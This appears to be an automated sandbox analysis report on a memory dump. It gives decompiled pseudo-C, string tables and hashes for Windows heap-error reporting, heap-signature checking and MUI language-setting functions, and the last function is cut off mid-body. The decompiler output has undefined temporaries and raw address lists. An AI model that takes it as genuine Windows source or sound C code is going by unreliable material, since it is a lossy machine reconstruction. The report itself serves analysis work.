*** Inpage error in %ws:%s, xrefs: 011EB418
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011EB484
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011EB47D
The critical section is owned by thread %p., xrefs: 011EB3B9
write to, xrefs: 011EB4A6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011EB323
*** then kb to get the faulting stack, xrefs: 011EB51C
Go determine why that thread has not released the critical section., xrefs: 011EB3C5
*** enter .cxr %p for the context, xrefs: 011EB50D
*** A stack buffer overrun occurred in %ws:%s, xrefs: 011EB2F3
The instruction at %p tried to %s , xrefs: 011EB4B6
<unknown>, xrefs: 011EB27E, 011EB2D1, 011EB350, 011EB399, 011EB417, 011EB48E

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: c01233c071f8d0ad028b289366e98df2316137cf5d05fb2ffd5ace9ad63d9993
Instruction ID: 93da2e444c56ec93071695d3b81508e3bdf1d8f64bf18cb04995b2bc8e99c470
Opcode Fuzzy Hash: c01233c071f8d0ad028b289366e98df2316137cf5d05fb2ffd5ace9ad63d9993
Instruction Fuzzy Hash: 62817A31A08A20FFDF2D6A8ADC4EE7B3F66EF66A95F41004CF5052B112D3619461C776

Uniqueness

Uniqueness Score: -1.00%

Function 011F1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E011F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0113B150();
				} else {
					E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x122589c);
				E0113B150("Heap error detected at %p (heap handle %p)\n",  *0x12258a0);
				_t27 =  *0x1225898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M011F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0113B150();
				} else {
					E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0113B150("Error code: %d - %s\n",  *0x1225898);
				_t113 =  *0x12258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0113B150("Parameter1: %p\n",  *0x12258a4);
				}
				_t115 =  *0x12258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0113B150("Parameter2: %p\n",  *0x12258a8);
				}
				_t117 =  *0x12258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0113B150("Parameter3: %p\n",  *0x12258ac);
				}
				_t119 =  *0x12258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12258b4);
					E0113B150("Last known valid blocks: before - %p, after - %p\n",  *0x12258b0);
				} else {
					_t120 =  *0x12258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0113B150();
				} else {
					E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0113B150("Stack trace available at %p\n", 0x12258c0);
			}

0x011f1c10
0x011f1c16
0x011f1c1e
0x011f1c3d
0x011f1c3e
0x011f1c20
0x011f1c35
0x011f1c3a
0x011f1c44
0x011f1c55
0x011f1c5a
0x011f1c65
0x011f1c67
0x00000000
0x011f1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x011f1c67
0x011f1cdc
0x011f1ce5
0x011f1d04
0x011f1d05
0x011f1ce7
0x011f1cfc
0x011f1d01
0x011f1d0b
0x011f1d17
0x011f1d1f
0x011f1d25
0x011f1d30
0x011f1d4f
0x011f1d50
0x011f1d32
0x011f1d47
0x011f1d4c
0x011f1d61
0x011f1d67
0x011f1d68
0x011f1d6e
0x011f1d79
0x011f1d98
0x011f1d99
0x011f1d7b
0x011f1d90
0x011f1d95
0x011f1daa
0x011f1db0
0x011f1db1
0x011f1db7
0x011f1dc2
0x011f1de1
0x011f1de2
0x011f1dc4
0x011f1dd9
0x011f1dde
0x011f1df3
0x011f1df9
0x011f1dfa
0x011f1e00
0x011f1e0a
0x011f1e13
0x011f1e32
0x011f1e33
0x011f1e15
0x011f1e2a
0x011f1e2f
0x011f1e39
0x011f1e4a
0x011f1e02
0x011f1e02
0x011f1e08
0x00000000
0x00000000
0x011f1e08
0x011f1e5b
0x011f1e7a
0x011f1e7b
0x011f1e5d
0x011f1e72
0x011f1e77
0x011f1e95

Strings

heap_failure_usage_after_free, xrefs: 011F1CBB
heap_failure_multiple_entries_corruption, xrefs: 011F1C8A
heap_failure_virtual_block_corruption, xrefs: 011F1C91
heap_failure_invalid_argument, xrefs: 011F1CAD
heap_failure_block_not_busy, xrefs: 011F1CA6
Last known valid blocks: before - %p, after - %p, xrefs: 011F1E45
Heap error detected at %p (heap handle %p), xrefs: 011F1C50
heap_failure_entry_corruption, xrefs: 011F1C83
heap_failure_generic, xrefs: 011F1C7C
HEAP: , xrefs: 011F1C16, 011F1C3D, 011F1D04, 011F1D4F, 011F1D98, 011F1DE1, 011F1E32, 011F1E7A
heap_failure_lfh_bitmap_mismatch, xrefs: 011F1CD7
heap_failure_unknown, xrefs: 011F1C75
Parameter2: %p, xrefs: 011F1DA5
heap_failure_listentry_corruption, xrefs: 011F1CD0
heap_failure_invalid_allocation_type, xrefs: 011F1CB4
Parameter1: %p, xrefs: 011F1D5C
heap_failure_buffer_underrun, xrefs: 011F1C9F
Error code: %d - %s, xrefs: 011F1D12
heap_failure_internal, xrefs: 011F1C6E
Stack trace available at %p, xrefs: 011F1E86
heap_failure_freelists_corruption, xrefs: 011F1CC9
HEAP[%wZ]: , xrefs: 011F1C30, 011F1CF7, 011F1D42, 011F1D8B, 011F1DD4, 011F1E25, 011F1E6D
heap_failure_cross_heap_operation, xrefs: 011F1CC2
heap_failure_buffer_overrun, xrefs: 011F1C98
Parameter3: %p, xrefs: 011F1DEE

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e1dff9d2d1bfca4ce8631eb36a2c4efb28b22550f596626e97b23d76961be527
Instruction ID: bffd1e309864b3c3d2891195ec98825e7852978830e3224811307d6467058aaf
Opcode Fuzzy Hash: e1dff9d2d1bfca4ce8631eb36a2c4efb28b22550f596626e97b23d76961be527
Instruction Fuzzy Hash: E461D337516155FFD22DAB89F588E2873A4EB04930B4EC06EF6096B345E7B49891CB0B

Uniqueness

Uniqueness Score: -1.00%

Function 01143D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01143D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01141B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01141B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01141B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01141B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01141B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01154620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0117F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01181370(_t276, 0x1114e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0117BB40(0,  &_v68, _t170);
									if(L011443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0117BB40(_t257,  &_v68, _t243);
								if(L011443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01181370(_t278, 0x1114e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01154620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0117F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01181370(_v16, 0x1114e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0117BB40(_t262,  &_v68, _t244);
								if(L011443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01181370(_t282, 0x1114e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0117BB40(_t262,  &_v68, _t201);
							if(L011443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01154620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0117F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01181370(_t280, 0x1114e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0117BB40(_t267,  &_v68, _t245);
							if(L011443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01181370(_t284, 0x1114e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0117BB40(_t267,  &_v68, _t224);
						if(L011443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01143d3c
0x01143d42
0x01143d44
0x01143d46
0x01143d49
0x01143d4c
0x01143d4f
0x01143d52
0x01143d55
0x01143d58
0x01143d5b
0x01143d5f
0x01143d61
0x01143d66
0x01198213
0x01198218
0x01144085
0x01144088
0x0114408e
0x01144094
0x0114409a
0x011440a0
0x011440a6
0x011440a9
0x011440af
0x011440b6
0x011440bd
0x011440bd
0x01143d83
0x0119821f
0x01198229
0x01198238
0x01198238
0x0119823d
0x0119823d
0x01143da0
0x01143daf
0x01143db5
0x01143dba
0x01143dba
0x01143dd4
0x01143e94
0x01143eab
0x01143f6d
0x01143f84
0x0114406b
0x0114406b
0x0114406e
0x0114406e
0x01144070
0x01144074
0x01198351
0x01198351
0x0114407a
0x0114407f
0x0119835d
0x01198370
0x01198377
0x01198379
0x0119837c
0x0119837c
0x0119835d
0x00000000
0x0114407f
0x01143f8a
0x01143f8d
0x01143f90
0x01143f95
0x0119830d
0x0119830f
0x01143f9b
0x01143fac
0x01143fae
0x01143fb1
0x01143fb1
0x01143fb6
0x01198317
0x0119831a
0x00000000
0x01143fbc
0x01143fc1
0x01143fc9
0x01143fd7
0x01143fda
0x01143fdd
0x01144021
0x01144021
0x01144029
0x01144030
0x01144044
0x01144046
0x01144046
0x01144044
0x01144049
0x01198327
0x01198334
0x01198339
0x0119833c
0x0114404f
0x0114404f
0x0114404f
0x01144051
0x01144056
0x01144063
0x01144063
0x01144068
0x00000000
0x01144068
0x01143fdf
0x01143fe2
0x01143fe4
0x01143fe7
0x01143fef
0x01144003
0x01144005
0x01144005
0x0114400c
0x01144013
0x01144016
0x01144017
0x0114401b
0x0114401e
0x00000000
0x0114401e
0x01143fb6
0x01143eb1
0x01143eb4
0x01143eb7
0x01143ebc
0x011982a9
0x011982ab
0x01143ec2
0x01143ed3
0x01143ed5
0x01143ed8
0x01143ed8
0x01143edd
0x011982b3
0x011982b6
0x00000000
0x01143ee3
0x01143ee8
0x01143eed
0x01143ef0
0x01143ef3
0x01143f02
0x01143f05
0x01143f08
0x011982c0
0x011982c3
0x011982c5
0x011982c8
0x011982d0
0x011982e4
0x011982e6
0x011982e6
0x011982ed
0x011982f4
0x011982f7
0x011982f8
0x011982fc
0x011982ff
0x011982ff
0x01143f0e
0x01143f11
0x01143f16
0x01143f1d
0x01143f31
0x01198307
0x01198307
0x01143f31
0x01143f39
0x01143f48
0x01143f4d
0x01143f50
0x01143f50
0x01143f53
0x01143f58
0x01143f65
0x01143f65
0x01143f6a
0x00000000
0x01143f6a
0x01143edd
0x01143dda
0x01143ddd
0x01143de0
0x01143de5
0x01198245
0x01143deb
0x01143df7
0x01143dfc
0x01143dfe
0x01143e01
0x01143e01
0x01143e06
0x0119824d
0x0119824f
0x01198254
0x00000000
0x01143e0c
0x01143e11
0x01143e16
0x01143e19
0x01143e29
0x01143e2c
0x01143e2f
0x0119825c
0x0119825f
0x01198261
0x01198264
0x0119826c
0x01198280
0x01198282
0x01198282
0x01198289
0x01198290
0x01198293
0x01198294
0x01198298
0x0119829b
0x0119829b
0x01143e35
0x01143e38
0x01143e3d
0x01143e44
0x01143e58
0x011982a3
0x011982a3
0x01143e58
0x01143e60
0x01143e6f
0x01143e74
0x01143e77
0x01143e77
0x01143e7a
0x01143e7f
0x01143e8c
0x01143e8c
0x01143e91
0x00000000
0x01143e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01143E97
Kernel-MUI-Number-Allowed, xrefs: 01143D8C
Kernel-MUI-Language-Allowed, xrefs: 01143DC0
Kernel-MUI-Language-SKU, xrefs: 01143F70
WindowsExcludedProcs, xrefs: 01143D6F

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: c660e11baac4615b52d5833bb4995232b850b7057a1fc323f458cae0baa2c8ef
Instruction ID: a9db88341cc3bc18034fb3826f2ddffc3ded1ac25b35de48d98a250a2d488fd3
Opcode Fuzzy Hash: c660e11baac4615b52d5833bb4995232b850b7057a1fc323f458cae0baa2c8ef
Instruction Fuzzy Hash: 72F17272D14629EFCF19DF98C940AEEBBB9FF08A50F15006AE915E7650E7349E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 011340E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E011340E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0113B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0113B150(", passed to %s", _t29);
					}
					_push("\n");
					E0113B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1226378 = 1;
						asm("int3");
						 *0x1226378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x011340e6
0x011340e8
0x011340f1
0x0119042d
0x0119044c
0x01190451
0x0119042f
0x01190444
0x01190449
0x0119045d
0x01190466
0x0119046e
0x01190474
0x01190475
0x0119047a
0x0119048a
0x0119048c
0x01190493
0x01190494
0x01190494
0x00000000
0x0119049b
0x00000000

Strings

HEAP: , xrefs: 0119044C
Invalid heap signature for heap at %p, xrefs: 01190458
RtlAllocateHeap, xrefs: 01190468
, passed to %s, xrefs: 01190469
HEAP[%wZ]: , xrefs: 0119043F

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 718a2a95030dd4359036e0f5871652ebfa7a7e8e56f7e418e170fafc1fdbf58b
Instruction ID: 355bb14891bc21aabf868e299d0d46417e04bec5bf4735a1484980ac261b1da9
Opcode Fuzzy Hash: 718a2a95030dd4359036e0f5871652ebfa7a7e8e56f7e418e170fafc1fdbf58b
Instruction Fuzzy Hash: DB012033205241EED32D9B69F40DF96B7A8DB85F34F1D407EF01547685DBE59440C619

Uniqueness

Uniqueness Score: -1.00%

Function 0115A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0115A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1228748 - 1;
					if( *0x1228748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0113B150();
									_t260 = _t257 + 4;
								} else {
									E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0113B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1227bc8;
								if(__eflags == 0) {
									E011F2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E011FA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0118D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0115AB40(_t206, _t252, 1, _t185, _t211);
